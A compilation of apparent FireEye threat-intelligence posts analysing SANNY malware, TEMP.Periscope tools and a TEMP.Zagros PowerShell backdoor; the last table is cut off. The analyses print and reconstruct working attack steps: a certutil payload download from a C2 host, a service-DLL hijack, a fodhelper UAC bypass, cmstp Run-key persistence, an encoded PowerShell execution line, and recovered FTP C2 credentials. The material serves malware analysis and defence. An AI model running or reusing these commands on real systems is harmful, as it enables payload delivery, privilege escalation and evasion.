In Stage 1, the macro leverages the legitimate Microsoft Windows certutil.exe utility to download an encoded Windows Batch (BAT) file from the following URL: hxxp://more.1apps[.]com/1.txt. The macro then decodes the encoded file and drops it in the %temp% directory with the name: 1.bat.

There were a few interesting observations in the command line:

  1. The macro copies the Microsoft Windows certutil.exe utility to the %temp% directory with the name: ct.exe. One of the reasons for this is to evade detection by security products. Recently, FireEye has observed other threat actors using certutil.exe for malicious purposes. By renaming “certutil.exe” before execution, the malware authors are attempting to evade simple file-name based heuristic detections.
  2. The malicious BAT file is stored as the contents of a fake PEM encoded SSL certificate (with the BEGIN and END markers) on the Stage 1 URL, as shown in Figure 3. The “certutil.exe” utility is then leveraged to both strip the BEGIN/END markers and decode the Base64 contents of the file; a hedged reconstruction of these commands follows Figure 3. FireEye has not previously observed the malware authors use this technique in past campaigns.


Figure 3: Malicious BAT file stored as an encoded file to appear as an SSL certificate
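As a rough illustration of this download-and-decode chain (not the exact command lines used by the macro), the equivalent certutil.exe invocations would look roughly like the following. The URL is left defanged as in the post, so these lines will not resolve as written:

# Hedged sketch: copy certutil.exe to %temp% as ct.exe to dodge file-name based detections
Copy-Item "$env:windir\System32\certutil.exe" "$env:TEMP\ct.exe"

# Download the fake "certificate" (really a Base64-encoded BAT file); URL intentionally defanged
& "$env:TEMP\ct.exe" -urlcache -split -f 'hxxp://more.1apps[.]com/1.txt' "$env:TEMP\1.txt"

# certutil -decode strips the BEGIN/END CERTIFICATE markers and Base64-decodes the body
& "$env:TEMP\ct.exe" -decode "$env:TEMP\1.txt" "$env:TEMP\1.bat"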

BAT File Analysis

Once decoded and executed, the BAT file from Stage 1 will download an encoded CAB file from the base URL: hxxp://more.1apps[.]com/. The exact file name downloaded is based on the architecture of the operating system.

  • For a 32-bit operating system: hxxp://more.1apps[.]com/2.txt
  • For a 64-bit operating system: hxxp://more.1apps[.]com/3.txt

Similarly, based on Windows operating system version and architecture, the CAB file is installed using different techniques. For Windows 10, the BAT file uses rundll32 to invoke the appropriate function from update.dll (component inside setup.cab).

  • For a 32-bit operating system: rundll32 update.dll _EntryPoint@16
  • For a 64-bit operating system: rundll32 update.dll EntryPoint

For other versions of Windows, the CAB file is extracted using the legitimate Windows Update Standalone Installer (wusa.exe) directly into the system directory.

The BAT file also checks for the presence of Kaspersky Lab antivirus software on the machine. If found, the CAB installation is changed accordingly in an attempt to bypass detection.
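Expressed as a rough PowerShell sketch (the actual logic lives in the downloaded BAT file; the download-and-decode step and the Kaspersky-specific branch described above are omitted, and file paths are assumptions):

# Hedged reconstruction of the BAT file's install flow, not the original script
$base = 'hxxp://more.1apps[.]com/'          # defanged, as in the blog
$cab  = "$env:TEMP\setup.cab"
$url  = if ([Environment]::Is64BitOperatingSystem) { $base + '3.txt' } else { $base + '2.txt' }
# (downloading and decoding $url into $cab is omitted; see the certutil sketch earlier)

if ([Environment]::OSVersion.Version.Major -ge 10) {
    # Windows 10: invoke update.dll from the CAB via rundll32
    $entry = if ([Environment]::Is64BitOperatingSystem) { 'EntryPoint' } else { '_EntryPoint@16' }
    & rundll32.exe "update.dll,$entry"
} else {
    # Older Windows: expand the CAB directly into the system directory with wusa.exe
    & wusa.exe $cab "/extract:$env:windir\System32"
}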

Stage 2: CAB File Analysis

As described in the previous section, the BAT file will download the CAB file based on the architecture of the underlying operating system. The rest of the malicious activities are performed by the downloaded CAB file.

The CAB file contains the following components:

  • install.bat – BAT file used to deploy and execute the components.
  • ipnet.dll – Main component that we refer to as SANNY malware.
  • ipnet.ini – Config file used by SANNY malware.
  • NTWDBLIB.dll – Performs UAC bypass on Windows 7 (32-bit and 64-bit).
  • update.dll – Performs UAC bypass on Windows 10.

install.bat will perform the following essential activities:

  1. Checks the current execution directory of the BAT file. If it is not the Windows system directory, then it will first copy the necessary components (ipnet.dll and ipnet.ini) to the Windows system directory before continuing execution:



  2. Hijacks a legitimate Windows system service, COMSysApp (COM+ System Application), by first stopping this service and then modifying the appropriate Windows service registry keys to ensure that the malicious ipnet.dll will be loaded when the COMSysApp service is started (a hedged reconstruction of this step follows the list):



  3. After the hijacked COMSysApp service is started, it will delete all remaining components of the CAB file.
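The exact commands appear as screenshots in the original post. As a heavily hedged reconstruction of the service hijack in step 2, built on the standard svchost ServiceDll mechanism (the service configuration, paths, and value names here are assumptions, not strings recovered from install.bat):

# Hedged sketch of a COMSysApp service hijack; not the literal commands from the sample
sc.exe stop COMSysApp
sc.exe config COMSysApp type= own start= auto binpath= "C:\Windows\System32\svchost.exe -k COMSysApp"
reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\COMSysApp\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\ipnet.dll" /f
sc.exe start COMSysApp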

ipnet.dll is the main component inside the CAB file that is used for performing malicious activities. This DLL exports the following two functions:

  1. ServiceMain – Invoked when the hijacked system service, COMSysApp, is started.
  2. Post – Used to perform data exfiltration to the command and control (C2) server using the FTP protocol.

The ServiceMain function first performs a check to see if it is being run in the context of svchost.exe or rundll32.exe. If it is being run in the context of svchost.exe, then it will first start the system service before proceeding with the malicious activities. If it is being run in the context of rundll32.exe, then it performs the following activities:

  1. Deletes the module NTWDBLIB.DLL from the disk using the following command:

    cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL

  2. Sets the code page on the system to 65001, which corresponds to UTF-8:

    cmd /c REG ADD HKCU\Console /v CodePage /t REG_DWORD /d 65001 /f

Command and Control (C2) Communication

SANNY malware uses the FTP protocol as the C2 communication channel.

FTP Config File

The FTP configuration information used by SANNY malware is encoded and stored inside ipnet.ini.

This file is Base64 encoded using the following custom character set: SbVIn=BU/dqNP2kWw0oCrm9xaJ3tZX6OpFc7Asi4lvuhf-TjMLRQ5GKeEHYgD1yz8
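A minimal decoding sketch is shown below, assuming the listed characters map positionally onto the standard Base64 alphabet plus the '=' padding character (the mapping order and the local file path are assumptions):

# Hedged sketch: translate the custom alphabet back to standard Base64, then decode
$custom   = 'SbVIn=BU/dqNP2kWw0oCrm9xaJ3tZX6OpFc7Asi4lvuhf-TjMLRQ5GKeEHYgD1yz8'
$standard = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
$map = @{}
for ($i = 0; $i -lt $custom.Length; $i++) { $map[$custom[$i]] = $standard[$i] }

$encoded    = (Get-Content -Raw '.\ipnet.ini') -replace '\s', ''      # path is illustrative
$translated = -join ($encoded.ToCharArray() | ForEach-Object { $map[$_] })
[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($translated))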

Upon decoding the file, the following credentials can be recovered:

  • FTP Server: ftp.capnix[.]com
  • Username: cnix_21072852
  • Password: vlasimir2017

The malware then connects to the FTP server decoded from the aforementioned config file and sets the current directory on the FTP server to “htdocs” using the FtpSetCurrentDirectoryW function.

System Information Collection

For reconnaissance purposes, SANNY malware executes commands on the system to collect information, which is sent to the C2 server.

System information is gathered from the machine using the following command:

The list of running tasks on the system is gathered by executing the following command:

C2 Commands

After successful connection to the FTP server decoded from the configuration file, the malware searches for a file containing the substring “to everyone” in the “htdocs” directory. This file will contain C2 commands to be executed by the malware.

Upon discovery of the file with the “to everyone” substring, the malware will download the file and then perform actions based on the following command names:

  • chip command: This command deletes the existing ipnet.ini configuration file from the file system and creates a new ipnet.ini file with a specified configuration string. The chip command allows the attacker to migrate the malware to a new FTP C2 server. The command has the following syntax:



  • pull command: This command is used for the purpose of data exfiltration. It has the ability to upload an arbitrary file from the local filesystem to the attacker’s FTP server. The command has the following syntax:

The uploaded file is compressed and encrypted using the routine described later in the Compression and Encoding Data section.

  • put command: This command is used to copy an existing file on the system to a new location and delete the file from the original location. The command has the following syntax:

  • default command: If the command begins with the substring “cmd /c”, but is not followed by any of the previous commands (chip, pull, or put), then it directly executes the command on the machine using WinExec.
  • /user command: This command executes a command on the system as the logged-in user. The command duplicates the access token of “explorer.exe” and spawns a process using the following steps:

    1. Enumerates the running processes on the system to search for the explorer.exe process and obtain the process ID of explorer.exe.
    2. Obtains the access token for the explorer.exe process with the access flags set to 0x000F01FF.
    3. Starts the application (defined in the C2 command) on the system by calling the CreateProcessAsUser function and using the access token obtained in Step 2.

C2 Command       Purpose

chip             Update the FTP server config file
pull             Upload a file from the machine
put              Copy an existing file to a new destination
/user            Create a new process with explorer.exe access token
default command  Execute a program on the machine using WinExec()

Compression and Encoding Data

SANNY malware uses an interesting mechanism for compressing the contents of data collected from the system and encoding it before exfiltration. Instead of using an archiving utility, the malware leverages the Shell.Application COM object and calls the CopyHere method of the IShellDispatch interface to perform compression as follows (a hedged sketch of the sequence appears after the list):

  1. Creates an empty ZIP file with the name: temp.zip in the %temp% directory.
  2. Writes the first 16 bytes of the PK header to the ZIP file.
  3. Calls the CopyHere method of IShellDispatch interface to compress the collected data and write to temp.zip.
  4. Reads the contents of temp.zip to memory.
  5. Deletes temp.zip from the disk.
  6. Creates an empty file, post.txt, in the %temp% directory.
  7. The temp.zip file contents are Base64 encoded (using the same custom character set mentioned in the previous FTP Config File section) and written to the file: %temp%\post.txt.
  8. Calls the FtpPutFileW function to write the contents of post.txt to the remote file with the format: “from <computer_name_timestamp>.txt”
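A minimal sketch of this sequence, with illustrative file names (the sample's exact header bytes and input files are not reproduced here):

# Hedged sketch of the Shell.Application-based ZIP trick; names and paths are illustrative
$zipPath = Join-Path $env:TEMP 'temp.zip'

# A minimal empty ZIP: the "PK\x05\x06" end-of-central-directory record padded with zero bytes
$header = New-Object byte[] 22
$header[0] = 0x50; $header[1] = 0x4B; $header[2] = 0x05; $header[3] = 0x06
[IO.File]::WriteAllBytes($zipPath, $header)

# Compress collected data into the ZIP via the IShellDispatch CopyHere method
$shell = New-Object -ComObject Shell.Application
$shell.NameSpace($zipPath).CopyHere('C:\Users\Public\collected.txt')   # hypothetical input file
Start-Sleep -Seconds 2                                                 # CopyHere runs asynchronously

# Read the archive into memory and remove it from disk, as the malware does
$zipBytes = [IO.File]::ReadAllBytes($zipPath)
Remove-Item $zipPath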

Execution on Windows 7 and User Account Control (UAC) Bypass

NTWDBLIB.dll – This component from the CAB file will be extracted to the %windir%\system32 directory. After this, the cliconfg command is executed by the BAT file.

The purpose of this DLL module is to launch the install.bat file. The file cliconfg.exe is a legitimate Windows binary (the SQL Client Configuration Utility) that loads the library NTWDBLIB.dll upon execution. Placing a malicious copy of NTWDBLIB.dll in the same directory as cliconfg.exe is a technique known as DLL side-loading, and it results in a UAC bypass.
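Conceptually, the side-load amounts to little more than the following (paths are illustrative; in the actual attack the CAB extraction, not a manual copy, places the DLL):

# Illustrative only: cliconfg.exe loads NTWDBLIB.dll from its own directory first,
# so a malicious copy placed alongside it is loaded into the auto-elevated process
Copy-Item -Path '.\NTWDBLIB.dll' -Destination "$env:windir\System32\NTWDBLIB.dll"
Start-Process -FilePath "$env:windir\System32\cliconfg.exe"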

Execution on Windows 10 and UAC Bypass

Update.dll – This component from the CAB file is used to perform UAC bypass on Windows 10. As described in the BAT File Analysis section, if the underlying operating system is Windows 10, then it uses update.dll to begin the execution of code instead of invoking the install.bat file directly.

The main actions performed by update.dll are as follows:

  1. Executes the following commands to setup the Windows registry for UAC bypass:



  2. Leverages a UAC bypass technique that uses the legitimate Windows binary, fodhelper.exe, to perform the UAC bypass on Windows 10 so that the install.bat file is executed with elevated privileges (a generic sketch of this technique follows the list):



  3. Creates an additional BAT file, kill.bat, in the current directory to delete evidence of the UAC bypass. The BAT file kills the current process and deletes the components update.dll and kill.bat from the file system.
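Returning to step 2: the registry commands themselves appear as screenshots in the original post. A generic sketch of the publicly documented fodhelper.exe bypass looks like the following, with a placeholder payload path rather than whatever update.dll actually registers:

# Generic fodhelper.exe UAC bypass sketch; not the literal commands used by update.dll
$key = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'
New-Item -Path $key -Force | Out-Null
New-ItemProperty -Path $key -Name 'DelegateExecute' -Value '' -Force | Out-Null
Set-ItemProperty -Path $key -Name '(default)' -Value 'C:\ProgramData\install.bat'   # placeholder payload
Start-Process "$env:windir\System32\fodhelper.exe"   # auto-elevates and runs the registered command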

Conclusion

This activity shows us that the threat actors using SANNY malware are evolving their malware delivery methods, notably by incorporating UAC bypasses and endpoint evasion techniques. By using a multi-stage attack with a modular architecture, the malware authors increase the difficulty of reverse engineering and potentially evade security solutions.

Users can protect themselves from such attacks by disabling Office macros in their settings and practicing vigilance when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

Indicators of Compromise

SHA256 Hash                                                       Original Filename

b0f30741a2449f4d8d5ffe4b029a6d3959775818bf2e85bab7fea29bd5acafa4  РГНФ 2018-2019.doc
e29fad201feba8bd9385893d3c3db42bba094483a51d17e0217ceb7d3a7c08f1  Copy of communication from Security Council Committee (1718).doc
eb394523df31fc83aefa402f8015c4a46f534c0a1f224151c47e80513ceea46f  1.bat
a2e897c03f313a097dc0f3c5245071fbaeee316cfb3f07785932605046697170  Setup.cab (64-bit)
a3b2c4746f471b4eabc3d91e2d0547c6f3e7a10a92ce119d92fa70a6d7d3a113  Setup.cab (32-bit)

DOSfuscation: Exploring the Depths of Cmd.exe Obfuscation and Detection Techniques

Skilled attackers continually seek out new attack vectors, while employing evasion techniques to maintain the effectiveness of old vectors, in an ever-changing defensive landscape. Many of these threat actors employ obfuscation frameworks for common scripting languages such as JavaScript and PowerShell to thwart signature-based detections of common offensive tradecraft written in these languages.

However, as defenders' visibility into these popular scripting languages increases through better logging and defensive tooling, some stealthy attackers have shifted their tradecraft to languages that do not support this additional visibility. At a minimum, determined attackers are adding dashes of simple obfuscation to previously detected payloads and commands to break rigid detection rules.

In this DOSfuscation white paper, first presented at Black Hat Asia 2018, I showcase nine months of research into several facets of command line argument obfuscation that affect static and dynamic detection approaches. Beginning with cataloguing a half-dozen characters with significant obfuscation capabilities (only two of which I have identified being used in the wild), I then highlight the static detection evasion capabilities of environment variable substring encoding. Combining these techniques, I unveil four never-before-seen payload obfuscation approaches that are fully compatible with any input command on cmd.exe's command line. These obfuscation capabilities de-obfuscate in the current cmd.exe session for both interactive and noninteractive sessions, and avoid all command line logging. Finally, I discuss the building blocks required for these new encoding and obfuscation capabilities and outline several approaches that defenders can take to begin detecting this genre of obfuscation.
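As a small illustration of the environment variable substring idea (an illustrative aside, not an example taken from the paper), cmd.exe will happily assemble command names from slices of variables such as %ComSpec%:

# %ComSpec% is "C:\Windows\system32\cmd.exe"; the three characters starting seven from the
# end are "cmd", so the substring expansion below prints "cmd" when run through cmd.exe
cmd.exe /c 'echo %ComSpec:~-7,3%'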

As a Senior Applied Security Researcher with FireEye's Advanced Practices Team, I am tasked with researching, developing and deploying new detection capabilities to FireEye's detection platform to stay ahead of advanced threat actors and their ever-changing tactics, techniques and procedures. FireEye customers have been benefiting from multiple layers of innovative obfuscation detection capabilities developed and deployed over the past nine months as a direct result of this research.

Download the DOSfuscation white paper today.

Daniel Bohannon (@danielhbohannon) is a Senior Applied Security Researcher on FireEye's Advanced Practices Team.

Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries

Intrusions Focus on the Engineering and Maritime Sector

Since early 2018, FireEye (including our FireEye as a Service (FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities, especially those connected to South China Sea issues. The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013, dubbed TEMP.Periscope. The group has also been reported as “Leviathan” by other security firms.

The current campaign is a sharp escalation of detected activity since summer 2017. Like multiple other Chinese cyber espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit. Known targets of this group have been involved in the maritime industry, as well as engineering-focused entities, and include research institutes, academic organizations, and private firms in the United States. FireEye products have robust detection for the malware used in this campaign.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities. However, the group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. Identified victims were mostly found in the United States, although organizations in Europe and at least one in Hong Kong have also been affected. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting on “NanHaiShu.”

TTPs and Malware Used

In their recent spike in activity, TEMP.Periscope has leveraged a relatively large library of malware shared with multiple other suspected Chinese groups. These tools include:

  • AIRBREAK: a JavaScript-based backdoor also reported as “Orz” that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services.
  • BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration.
  • PHOTO: a DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.
  • HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.
  • LUNCHMONEY: an uploader that can exfiltrate files to Dropbox.
  • MURKYTOP: a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.
  • China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.

The following are tools that TEMP.Periscope has leveraged in past operations and could use again, though these have not been seen in the current wave of activity:

  • Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands.
  • BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal. Used by APT17 and other Chinese cyber espionage operators.

Additional identifying TTPs include:

  • Spear phishing, including the use of likely compromised email accounts.
  • Lure documents using CVE-2017-11882 to drop malware.
  • Stolen code signing certificates used to sign malware.
  • Use of bitsadmin.exe to download additional tools.
  • Use of PowerShell to download additional tools.
  • Using C:\Windows\Debug and C:\Perflogs as staging directories.
  • Leveraging Hyperhost VPS and Proton VPN exit nodes to access webshells on internet-facing systems.
  • Using Windows Management Instrumentation (WMI) for persistence.
  • Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence.
  • Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal.

Implications

The current wave of identified intrusions is consistent with TEMP.Periscope and likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations.

As we continue to investigate this activity, we may identify additional data leading to greater analytical confidence linking the operation to TEMP.Periscope or other known threat actors, as well as previously unknown campaigns.

Indicators

File     Hash                              Description

x.js     3fefa55daeb167931975c22df3eca20a  HOMEFRY, a 64-bit Windows password dumper/cracker
mt.exe   40528e368d323db0ac5c3f5e1efe4889  MURKYTOP, a command-line reconnaissance tool
com4.js  a68bf5fce22e7f1d6f999b7a580ae477  AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages

Historical Indicators

File                                           Hash                              Description

green.ddd                                      3eb6f85ac046a96204096ab65bbd3e7e  AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages
BGij                                           6e843ef4856336fe3ef4ed27a4c792b1  Beacon, a commercially available backdoor
msresamn.ttf                                   a9e7539c1ebe857bae6efceefaa9dd16  PHOTO, also reported as Derusbi
1024-aa6a121f98330df2edee6c4391df21ff43a33604  bd9e4c82bf12c4e7a58221fc52fed705  BADFLICK, backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration

Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign

Introduction

From January 2018 to March 2018, through FireEye’s Dynamic Threat Intelligence, we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East.

We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. The spear phishing emails and attached malicious macro documents typically have geopolitical themes. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS.

One of the more interesting observations during the analysis of these files was the re-use of the latest AppLocker bypass and lateral movement techniques for the purpose of indirect code execution. In the lateral movement techniques, the remote IP address was substituted with the local machine’s IP address to achieve code execution on the local system.

Campaign Timeline

In this campaign, the threat actor’s tactics, techniques and procedures (TTPs) shifted after about a month, as did their targets. A brief timeline of this activity is shown in Figure 1.


Figure 1: Timeline of this recently observed spear phishing campaign

The first part of the campaign (from Jan. 23, 2018, to Feb. 26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains a Base64-encoded PowerShell command, which is decoded and executed by PowerShell using a command line generated by the VBS file when it is run with WScript.exe. The process chain is shown in Figure 2.


Figure 2: Process chain for the first part of the campaign

Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of the process tree, its final purpose remained the same: invoking PowerShell to decode the Base64-encoded PowerShell command in the INI file that was dropped earlier by the macro, and executing it. One such example of the VBS invoking PowerShell via MSHTA is shown in Figure 3.


Figure 3: VBS invoking PowerShell via MSHTA

The second part of the campaign (from Feb. 27, 2018, to March 5, 2018) used a new variant of the macro that does not use VBS for PowerShell code execution. Instead, it uses one of the recently disclosed code execution techniques leveraging INF and SCT files, which we will go on to explain later in the blog.

Infection Vector

We believe the infection vector for all of the attacks in this campaign is a macro-based document sent as an email attachment. One such email that we were able to obtain was targeting users in Turkey, as shown in Figure 4:


Figure 4: Sample spear phishing email containing macro-based document attachment

The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey, Pakistan, Tajikistan and India. Four examples follow, and a complete list is available in the Indicators of Compromise section at the end of the blog.

Figure 5 shows a document purporting to be from the National Assembly of Pakistan.


Figure 5: Document purporting to be from the National Assembly of Pakistan

A document purporting to be from the Turkish Armed Forces, with content written in the Turkish language, is shown in Figure 6.


Figure 6: Document purporting to be from the Turkish Armed Forces

A document purporting to be from the Institute for Development and Research in Banking Technology (established by the Reserve Bank of India) is shown in Figure 7.


Figure 7: Document purporting to be from the Institute for Development and Research in Banking Technology

Figure 8 shows a document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan.


Figure 8: Document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan

Each of these macro-based documents used similar techniques for code execution, persistence and communication with the command and control (C2) server.

Indirect Code Execution Through INF and SCT

This scriptlet code execution technique leveraging INF and SCT files was recently discovered and documented in February 2018. The threat group in this recently observed campaign – TEMP.Zagros – weaponized their malware using the following techniques.

The macro in the Word document drops three files to a hard-coded path: C:\programdata. Since the path is hard coded, execution will only be observed on Windows 7 and later operating systems. The following are the three files:

  • Defender.sct – The malicious JavaScript based scriptlet file.
  • DefenderService.inf – The INF file that is used to invoke the above scriptlet file.
  • WindowsDefender.ini – The Base64 encoded and obfuscated PowerShell script.

After dropping the three files, the macro will set the following registry key to achieve persistence:

\REGISTRY\USER\SID\Software\Microsoft\Windows\CurrentVersion\Run\"WindowsDefenderUpdater" = cmstp.exe /s c:\programdata\DefenderService.inf

Upon system restart, cmstp.exe will be used to execute the SCT file indirectly through the INF file. This is possible because inside the INF file we have the following section:

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,c:/programdata/Defender.sct

That section gets indirectly invoked through the DefaultInstall_SingleUser section of INF, as shown in Figure 9.


Figure 9: Indirectly invoking SCT through the DefaultInstall_SingleUser section of INF

This method of code execution is performed in an attempt to evade security products. FireEye MVX and HX Endpoint Security technology successfully detect this code execution technique.

SCT File Analysis

The code of the Defender.sct file is obfuscated JavaScript. The main function performed by the SCT file is to Base64 decode the contents of the WindowsDefender.ini file and execute the decoded PowerShell script using the following command line:

powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\WindowsDefender.ini))))

The rest of the malicious activities are performed by the PowerShell Script.

PowerShell File Analysis

The PowerShell script employs several layers of obfuscation to hide its actual functionality. In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools.

Some of the key obfuscation techniques used are:

  • Character Replacement: Several instances of character replacement and string reversing techniques (Figure 10) make analysis difficult.


Figure 10: Character replacement and string reversing techniques

  • PowerShell Environment Variables: Nowadays, malware authors commonly mask critical strings such as “IEX” using environment variables. Some of the instances used in this script are (see the note after Figure 11 for how these resolve):
    • $eNv:puBLic[13]+$ENv:pUBLIc[5]+'x'
    • ($ENV:cOMsPEC[4,26,25]-jOin'')
  • XOR encoding: The biggest section of the PowerShell script is XOR encoded using a single byte key, as shown in Figure 11.


Figure 11: PowerShell script is XOR encoded using a single byte key
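For reference, the environment variable expressions listed above resolve to the string “iex” on a default installation, because $env:PUBLIC is "C:\Users\Public" and $env:ComSpec is "C:\Windows\system32\cmd.exe":

# Characters 13 and 5 of $env:PUBLIC are 'i' and 'e'; appending 'x' yields "iex"
$env:PUBLIC[13], $env:PUBLIC[5]
# Indices 4, 26 and 25 of $env:ComSpec spell out "iex"
($env:ComSpec[4,26,25] -join '')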

After deobfuscating the contents of the PowerShell Script, we can divide it into three sections.

Section 1

The first section of the PowerShell script is responsible for setting different key variables that are used by the remaining sections of the PowerShell script, especially the following variables:

  • TEMpPAtH = "C:\ProgramData\" (the path used for storing the temp files)
  • Get_vAlIdIP = https://api.ipify.org/ (used to get the public IP address of the machine)
    • FIlENAmePATHP = WindowsDefender.ini (file used to store the PowerShell code)
  • PRIVAtE = Private Key exponents
  • PUbLIc = Public Key exponents
  • Hklm = "HKLM:\Software\"
  • Hkcu = "HKCU:\Software\"
  • ValuE = "kaspersky"
  • SYSID
  • DrAGon_MidDLe = [array of proxy URLs]

Among those variables, there is one variable of particular interest, DrAGon_MidDLe, which stores the list of proxy URLs (detailed at the end of the blog in the Network Indicators portion of the Indicators of Compromise section) that will be used to interact with the C2 server, as shown in Figure 12.


Figure 12: DrAGon_MidDLe stores the list of proxy URLs used to interact with C2 server

Section 2

The second section of the PowerShell script has the ability to perform encryption and decryption of messages that are exchanged between the system and the C2 server. The algorithm used for encryption and decryption is RSA, which leverages the public and private key exponents included in Section 1 of the PowerShell script.

Section 3

The third section of the PowerShell script is the biggest section and has a wide variety of functionalities.

During analysis, we observed a code section where a message written in Chinese and hard coded in the script will be printed in the case of an error while connecting to the C2 server:

The English translation for this message is: “Cannot connect to website, please wait for dragon”.

Other functionalities provided by this section of the PowerShell Script are as follows:

  • Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables:
    • IP Address from Network Adapter Configuration
    • OS Name
    • OS Architecture
    • Computer Name
    • Computer Domain Name
    • Username

All of this data is concatenated and formatted as shown in Figure 13:


Figure 13: Concatenated and formatted data retrieved by PowerShell script

  • Register the victim’s machine to the C2 server by sending the REGISTER command to the server. In response, if the status is OK, then a TOKEN is received from the C2 server that is used to synchronize the activities between the victim’s machine and the C2 server.

While sending to the C2 server, the data is formatted as follows:

@{SYSINFO  = $get.ToString(); ACTION = "REGISTER";}

  • Ability to take screenshots.
  • Checks for the presence of security tools (detailed in the Appendix) and if any of these security tools are discovered, then the system will be shut down, as shown in Figure 14.


Figure 14: System shut down upon discovery of security tools

  • Ability to receive PowerShell script from the C2 server and execute on the machine. Several techniques are employed for executing the PowerShell code:
    • If the command starts with “excel”, then it leverages the DDEInitiate method of Excel.Application to execute the code: 
    • If the command starts with “outlook”, then it leverages Outlook.Application and MSHTA to execute the code: 
    • If the command starts with “risk”, then execution is performed through DCOM object: 
  • File upload functionality.
  • Ability to disable Microsoft Office Protected View (as shown in Figure 15) by setting the following keys in the Windows Registry:
    • DisableAttachmentsInPV
    • DisableInternetFilesInPV
    • DisableUnsafeLocationsInPV


Figure 15: Disabling Microsoft Office Protected View
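The value names listed above are the actual Protected View settings; as a hedged sketch, disabling them for Word could look like the following (the hive path and Office version are assumptions, not taken from the script):

# Hedged sketch: the value names come from the post; the key path and Office version are assumed
$pv = 'HKCU:\Software\Microsoft\Office\16.0\Word\Security\ProtectedView'
New-Item -Path $pv -Force | Out-Null
foreach ($name in 'DisableAttachmentsInPV', 'DisableInternetFilesInPV', 'DisableUnsafeLocationsInPV') {
    New-ItemProperty -Path $pv -Name $name -Value 1 -PropertyType DWord -Force | Out-Null
}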

  • Ability to remotely reboot, shut down or clean the system based on the command received from the C2 server, as shown in Figure 16.


Figure 16: Reboot, shut down and clean commands

  • Ability to sleep for a given number of seconds.

The following table summarizes the main C2 commands supported by this PowerShell Script.

C2 Command  Purpose

reboot      Reboot the system using shutdown command
shutdown    Shut down the system using shutdown command
clean       Wipe the Drives, C:\, D:\, E:\, F:\
screenshot  Take a screenshot of the System
upload      Encrypt and upload the information from the system
excel       Leverage Excel.Application COM object for code execution
outlook     Leverage Outlook.Application COM object for code execution
risk        Leverage DCOM object for code execution

Conclusion

This activity shows us that TEMP.Zagros stays up-to-date with the latest code execution and persistence techniques, and that they can quickly leverage these techniques to update their malware. By combining multiple layers of obfuscation, they make reverse engineering more difficult and also attempt to evade security products.

Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

Indicators of Compromise

Macro based Documents and Hashes

SHA256 Hash                                                       Filename                              Targeted Region

